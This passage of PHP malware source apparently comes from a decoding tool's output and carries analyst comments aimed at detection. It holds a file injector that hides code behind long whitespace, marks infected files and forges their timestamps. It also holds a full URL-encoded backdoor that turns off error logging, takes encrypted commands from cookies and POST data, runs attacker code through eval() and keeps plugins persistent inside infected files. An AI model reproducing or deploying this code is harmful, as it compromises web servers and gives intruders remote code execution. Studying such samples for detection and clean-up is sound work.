$hex .= "\\\\" . (strlen($code) == 3 ? $code : "0" . $code);
} else {
$hex .= $string[$i];
}
}
return $hex;
}
/**
 * Returns a string of $len space characters.
 *
 * @param int $len Number of spaces.
 * @return string
 */
static public function gen_space_string($len)
{
$str = "";
for ($i = 0; $i < $len; $i++) {
$str .= " ";
}
return $str;
}
/**
 * Analyst note: builds the inline variant of the injection, used when no file
 * could be dropped. The result is two statements: an assignment of the mutated
 * payload to a variable, then an eval() of that variable.
 *
 * For detection:
 *  - the variable name is fixed ("$user_auth_cookie") and survives the
 *    mutation, since morph_str() is applied to the payload text only;
 *  - the assignment line starts with 256 spaces, which moves the code out of
 *    view in editors that do not wrap long lines, so review such files with
 *    wrapping enabled or by searching, not by scrolling.
 *
 * @param string $string URL-encoded payload text.
 * @return string PHP source to be injected.
 */
static public function morph_php_str($string)
{
$assert_parameter_name = "\$user_auth_cookie";
$assert_payload = DomainFramer2::morph_str('eval(rawurldecode(\\"' . $string . '\\"));');
$initial_line = DomainFramer2::gen_space_string(256) . $assert_parameter_name . ' = "' . $assert_payload . '";' . "\n";
return $initial_line . "eval(" . $assert_parameter_name . ");";
}
/**
 * Analyst note: writes $php_code into the file at $path, wrapped in a pair of
 * identical marker comments.
 *
 * Facts useful for detection and clean-up:
 *  - the marker is a PHP block comment holding characters 5 to 9 of md5($path),
 *    so for a given absolute path the expected marker can be computed and
 *    searched for;
 *  - files containing "schemas/sitemap/0.9" are left alone;
 *  - when a PHP open tag precedes any "<html", the block goes directly after
 *    the first open tag; otherwise a new PHP block is prepended to the file;
 *  - an existing marked block is only removed when $force_inject is set; no
 *    branch returns early for an already-marked file, so a file may hold more
 *    than one injected block and clean-up should remove every occurrence;
 *  - after writing, the file's time is set 120 seconds into the future;
 *  - the file is chmod'ed to 0755 first.
 *
 * @param string $path          File to modify.
 * @param string $php_code      Code to insert.
 * @param bool   $force_inject  Remove an existing marked block before inserting.
 * @param bool   $recovery_mode Only proceed when the file already holds the marker.
 * @return bool TRUE when the marker is found in the file after writing.
 */
static public function insert_in_head($path, $php_code, $force_inject = FALSE, $recovery_mode = FALSE)
{
DomainFramer2::fix_rights($path);
if (!@is_writable($path))
{
return FALSE;
}
// Marker derived from the path only, hence stable across runs for the same file.
$already_patched_marker = "/*" . substr(md5($path), 5, 5) . "*/";
$php_code = "\n" . $already_patched_marker . "\n" . $php_code . "\n" . $already_patched_marker;
$content = @file_get_contents($path);
if (strpos($content, "schemas/sitemap/0.9") !== FALSE) {
return FALSE;
}
// A single marker means an incomplete pair; it is stripped.
if (substr_count($content, $already_patched_marker) === 1) {
$content = str_replace($already_patched_marker, "", $content);
}
if ($recovery_mode && strpos($content, $already_patched_marker) === FALSE)
{
return FALSE;
}
if (strpos($content, $already_patched_marker) !== FALSE && $force_inject) {
// Greedy match from the first marker to the last one in the file.
$from = "/" . preg_quote($already_patched_marker, "/") . "[.\\s\\S]*" . preg_quote($already_patched_marker, "/") . "/";
$content = preg_replace($from, "", $content, 1);
}
// Case-insensitive search for the first "<html" and the first PHP open tag.
$html_pos = stripos($content, "<" . "html");
$php_pos = stripos($content, "<" . "?php");
// A missing tag is given a position past the end so the comparison below still works.
if ($html_pos === FALSE) {
$html_pos = strlen($content) + 1;
}
if ($php_pos === FALSE) {
$php_pos = strlen($content) + 1;
}
if ($php_pos < $html_pos) {
$from = "/" . preg_quote("<" . "?" . "php", "/") . "/";
$content = preg_replace($from, "<" . "?" . "php" . $php_code, $content, 1);
} else {
$content = "<" . "?php " . $php_code . "\n?" . "> \n" . $content;
}
@file_put_contents($path, $content);
DomainFramer2::fix_time($path, time() + 120);
// The write is error-suppressed; success is confirmed by re-reading the file.
$content = @file_get_contents($path);
if (strpos($content, $already_patched_marker) !== FALSE) {
return TRUE;
} else {
return FALSE;
}
}
/**
 * Returns the most recent error text recorded by this object. The values set
 * in the visible part of the class are "no writable for payload",
 * "cant dump payload" and "unwritable for patch".
 *
 * @return string
 */
public function last_error()
{
return $this->_last_error;
}
}
$framer = new DomainFramer2("if%20%28%21defined%28%27stream_context_create%20%27%29%29%0A%7B%0Adefine%28%27stream_context_create%20%27%2C%201%29%3B%0A%40ini_set%28%27error_log%27%2C%20NULL%29%3B%40ini_set%28%27log_errors%27%2C%200%29%3B%40ini_set%28%27max_execution_time%27%2C%200%29%3B%40error_reporting%280%29%3B%40set_time_limit%280%29%3Bif%28%21defined%28%22PHP_EOL%22%29%29%7Bdefine%28%22PHP_EOL%22%2C%20%22%5Cn%22%29%3B%7Dif%20%28%21defined%28%27file_put_contents%20%27%29%29%7Bdefine%28%27file_put_contents%20%27%2C%201%29%3B%24ukwfik%20%3D%20%27acd14c4d-9a35-4b6f-b40f-ad76c9c8040f%27%3Bglobal%20%24ukwfik%3Bfunction%20xzpkqd%28%24vfpapv%29%20%7Bif%20%28strlen%28%24vfpapv%29%20%3C%204%29%7Breturn%20%22%22%3B%7D%24auleptmm%20%3D%20%22ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%2B/%3D%22%3B%24smgnwvjz%20%3D%20str_split%28%24auleptmm%29%3B%24smgnwvjz%20%3D%20array_flip%28%24smgnwvjz%29%3B%24ukonchp%20%3D%200%3B%24vvwyxfyx%20%3D%20%22%22%3B%24vfpapv%20%3D%20preg_replace%28%22%7E%5B%5EA-Za-z0-9%5C%2B%5C/%5C%3D%5D%7E%22%2C%20%22%22%2C%20%24vfpapv%29%3Bdo%20%7B%24hcybkhvd%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24wpeeeyt%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24gkzbzq%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24stjwqzxf%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24kgiqbylxuwgmizz%20%3D%20%28%24hcybkhvd%20%3C%3C%202%29%20%7C%20%28%24wpeeeyt%20%3E%3E%204%29%3B%24zqtjtw%20%3D%20%28%28%24wpeeeyt%20%26%2015%29%20%3C%3C%204%29%20%7C%20%28%24gkzbzq%20%3E%3E%202%29%3B%24rxspesu%20%3D%20%28%28%24gkzbzq%20%26%203%29%20%3C%3C%206%29%20%7C%20%24stjwqzxf%3B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24kgiqbylxuwgmizz%29%3Bif%20%28%24gkzbzq%20%21%3D%2064%29%20%7B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24zqtjtw%29%3B%7Dif%20%28%24stjwqzxf%20%21%3D%2064%29%20%7B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24rxspesu%29%3B%7D%7D%20while%20%28%24ukonchp%20%3C%20strlen%28%24vfpapv%29%29%3Bretu
rn%20%24vvwyxfyx%3B%7Dif%20%28%21function_exists%28%27file_put_contents%27%29%29%7Bfunction%20file_put_contents%28%24kgiqbylx%2C%20%24mplisjs%2C%20%24tzzlkdqu%20%3D%20False%29%7B%24mplisjsxfduvsk%20%3D%20%24tzzlkdqu%20%3D%3D%208%20%3F%20%27a%27%20%3A%20%27w%27%3B%24ycesld%20%3D%20%40fopen%28%24kgiqbylx%2C%20%24mplisjsxfduvsk%29%3Bif%20%28%24ycesld%20%3D%3D%3D%20False%29%7Breturn%200%3B%7Delse%7Bif%20%28is_array%28%24mplisjs%29%29%20%24mplisjs%20%3D%20implode%28%24mplisjs%29%3B%24wnosluwxalmvh%20%3D%20fwrite%28%24ycesld%2C%20%24mplisjs%29%3Bfclose%28%24ycesld%29%3Breturn%20%24wnosluwxalmvh%3B%7D%7D%7Dif%20%28%21function_exists%28%27file_get_contents%27%29%29%7Bfunction%20file_get_contents%28%24rjlsnfpf%29%7B%24kzseft%20%3D%20fopen%28%24rjlsnfpf%2C%20%22r%22%29%3B%24valusqf%20%3D%20fread%28%24kzseft%2C%20filesize%28%24rjlsnfpf%29%29%3Bfclose%28%24kzseft%29%3Breturn%20%24valusqf%3B%7D%7Dfunction%20encaioa%28%29%7Breturn%20trim%28preg_replace%28%22/%5C%28.%2A%5C%24/%22%2C%20%27%27%2C%20__FILE__%29%29%3B%7Dfunction%20skghtt%28%24uwucjfg%2C%20%24yjkllsil%29%7B%24xmfrdomo%20%3D%20%22%22%3Bfor%20%28%24ukonchp%3D0%3B%20%24ukonchp%3Cstrlen%28%24uwucjfg%29%3B%29%7Bfor%20%28%24wnosluw%3D0%3B%20%24wnosluw%3Cstrlen%28%24yjkllsil%29%20%26%26%20%24ukonchp%3Cstrlen%28%24uwucjfg%29%3B%20%24wnosluw%2B%2B%2C%20%24ukonchp%2B%2B%29%7B%24xmfrdomo%20.%3D%20chr%28ord%28%24uwucjfg%5B%24ukonchp%5D%29%20%5E%20ord%28%24yjkllsil%5B%24wnosluw%5D%29%29%3B%7D%7Dreturn%20%24xmfrdomo%3B%7Dfunction%20arcnll%28%24uwucjfg%2C%20%24yjkllsil%29%7Bglobal%20%24ukwfik%3Breturn%20skghtt%28skghtt%28%24uwucjfg%2C%20%24yjkllsil%29%2C%20%24ukwfik%29%3B%7Dfunction%20banwrr%28%24uwucjfg%2C%20%24yjkllsil%29%7Bglobal%20%24ukwfik%3Breturn%20skghtt%28skghtt%28%24uwucjfg%2C%20%24ukwfik%29%2C%20%24yjkllsil%29%3B%7Dfunction%20noibksfb%28%29%7B%24qwcgalds%20%3D%20%40file_get_contents%28encaioa%28%29%29%3B%24ytcijln%20%3D%20strpos%28%24qwcgalds%2C%20md5%28encaioa%28%29%29%29%3Bif%20%28%24ytcijln%20%21%3D%3D%20FALSE%29%7B%24c
pqiumbe%20%3D%20substr%28%24qwcgalds%2C%20%24ytcijln%20%2B%2032%29%3B%24hpcupip%20%3D%20%40unserialize%28arcnll%28rawurldecode%28%24cpqiumbe%29%2C%20md5%28encaioa%28%29%29%29%29%3B%7Delse%7B%24hpcupip%20%3D%20Array%28%29%3B%7Dreturn%20%24hpcupip%3B%7Dfunction%20igmddlhx%28%24hpcupip%29%7B%24etoboxnk%20%3D%20rawurlencode%28banwrr%28%40serialize%28%24hpcupip%29%2C%20md5%28encaioa%28%29%29%29%29%3B%24qwcgalds%20%3D%20%40file_get_contents%28encaioa%28%29%29%3B%24ytcijln%20%3D%20strpos%28%24qwcgalds%2C%20md5%28encaioa%28%29%29%29%3Bif%20%28%24ytcijln%20%21%3D%3D%20FALSE%29%7B%24bgnxkqjs%20%3D%20substr%28%24qwcgalds%2C%20%24ytcijln%20%2B%2032%29%3B%24qwcgalds%20%3D%20str_replace%28%24bgnxkqjs%2C%20%24etoboxnk%2C%20%24qwcgalds%29%3B%7Delse%7B%24qwcgalds%20%3D%20%24qwcgalds%20.%20%22%5Cn%5Cn//%22%20.%20md5%28encaioa%28%29%29%20.%20%24etoboxnk%3B%7D%40file_put_contents%28encaioa%28%29%2C%20%24qwcgalds%29%3B%7Dfunction%20wndfcdt%28%24uetgil%2C%20%24ukjayigb%29%7B%24hpcupip%20%3D%20noibksfb%28%29%3B%24hpcupip%5B%24uetgil%5D%20%3D%20xzpkqd%28%24ukjayigb%29%3Bigmddlhx%28%24hpcupip%29%3B%7Dfunction%20tnfqcb%28%24uetgil%29%7B%24hpcupip%20%3D%20noibksfb%28%29%3Bunset%28%24hpcupip%5B%24uetgil%5D%29%3Bigmddlhx%28%24hpcupip%29%3B%7Dfunction%20ielcyedg%28%24uetgil%3DNULL%29%7Bforeach%20%28noibksfb%28%29%20as%20%24hhghxqti%3D%3E%24yflueda%29%7Bif%20%28%24uetgil%29%7Bif%20%28strcmp%28%24uetgil%2C%20%24hhghxqti%29%20%3D%3D%200%29%7Beval%28%24yflueda%29%3Bbreak%3B%7D%7Delse%7Beval%28%24yflueda%29%3B%7D%7D%7Dforeach%20%28array_merge%28%24_COOKIE%2C%20%24_POST%29%20as%20%24txsyjapp%20%3D%3E%20%24uwucjfg%29%7B%24uwucjfg%20%3D%20%40unserialize%28arcnll%28xzpkqd%28%24uwucjfg%29%2C%20%24txsyjapp%29%29%3Bif%20%28isset%28%24uwucjfg%5B%27ak%27%5D%29%20%26%26%20%24ukwfik%3D%3D%24uwucjfg%5B%27ak%27%5D%29%7Bif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27i%27%29%7B%24ukonchp%20%3D%20Array%28%27pv%27%20%3D%3E%20%40phpversion%28%29%2C%27sv%27%20%3D%3E%20%272.0-1%27%2C%27ak%27%20%3D%3E%20%24uwucjfg%5B%27ak
%27%5D%2C%29%3Becho%20%40serialize%28%24ukonchp%29%3Bexit%3B%7Delseif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27e%27%29%7Beval%28%24uwucjfg%5B%27d%27%5D%29%3B%7Delseif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27plugin%27%29%7Bif%28%24uwucjfg%5B%27sa%27%5D%20%3D%3D%20%27add%27%29%7Bwndfcdt%28%24uwucjfg%5B%27p%27%5D%2C%20%24uwucjfg%5B%27d%27%5D%29%3B%7Delseif%28%24uwucjfg%5B%27sa%27%5D%20%3D%3D%20%27rem%27%29%7Btnfqcb%28%24uwucjfg%5B%27p%27%5D%29%3B%7D%7Decho%20%24uwucjfg%5B%27ak%27%5D%3Bexit%28%29%3B%7D%7Dielcyedg%28%29%3B%7D%0A%7D");
// Analyst note: driver section. The object created just above receives the
// URL-encoded second-stage script as its constructor argument; the calls below
// run the infection pass and report the outcome to the requester.
// NOTE(review): find_paths(), preprocess_paths(), process() and get_cscripts()
// are defined outside this excerpt; their behaviour is inferred from their names.
$framer->find_paths();
$framer->preprocess_paths();
// "$force_inject = TRUE" is an assignment expression, so TRUE is what gets passed.
$framer->process($force_inject = TRUE);
$cscripts = $framer->get_cscripts();
if (count($cscripts) == 0) {
// $this is referenced at file scope, where no object is in context, so this
// clean-up does not address the framer's dropped file as written; a dropped
// file may therefore remain on disk even when nothing was injected.
@unlink($this->_current_cscript_path);
}
$cscripts["last_error"] = $framer->last_error();
// The response body is a PHP-serialized array that always carries a
// "last_error" key; this shape can be matched in captured HTTP responses.
echo @serialize($cscripts);
exit();
Function Calls
None |
Stats
MD5 | 881f97cb4c8bd9de22da63d0ebf54132 |
Eval Count | 0 |
Decode Time | 65 ms |